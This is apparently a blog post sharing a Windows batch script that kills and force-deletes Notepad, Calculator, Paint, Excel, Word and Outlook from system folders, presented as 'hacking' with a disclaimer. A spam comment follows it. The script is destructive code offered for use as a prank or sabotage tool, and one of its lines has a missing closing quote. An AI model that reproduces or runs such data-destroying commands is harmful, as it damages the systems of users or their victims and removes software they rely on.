Code to Delete notepad, calc, paint, excel, word, outlook


rem ---------------------------------
rem Delete Notepad
tskill notepad
del /f /q "%windir%\system32\notepad.exe"
rem ---------------------------------
rem ---------------------------------
rem Delete Calculator
tskill calc
del /f /q "%windir%\system32\calc.exe
rem ---------------------------------
rem ---------------------------------
rem Delete Paint
tskill mspaint
del /f /q "%windir%\system32\mspaint.exe"
rem ---------------------------------
rem ---------------------------------
rem Delete Excel
tskill excel
del /f /q "%SystemDrive%\Program Files\Microsoft Office\Office10\EXCEL.EXE"
rem ---------------------------------
rem ---------------------------------
rem Delete Word
tskill WINWORD
del /f /q "%SystemDrive%\Program Files\Microsoft Office\Office10\WINWORD.EXE"
rem ---------------------------------
rem ---------------------------------
rem Delete Outlook
tskill outlook
del /f /q "%SystemDrive%\Program Files\Microsoft Office\Office10\OUTLOOK.EXE"
rem ---------------------------------



[Note: Be careful in using these scripts, i will not be responsible if you damage your system.] 


Enjoy Hacking....!!!!

Comments

  1. She's very pretty! I love mixed media, too, and want to experiment more with it in future. Thanks for the inspiring example. :) automotive paint

    ReplyDelete

Post a Comment

Popular posts from this blog

How to create your own 'stare and blink illusion picture'

Reduce Chrome Memory usage using TooManyTabs extension

Code to Delete my documents, pictures and music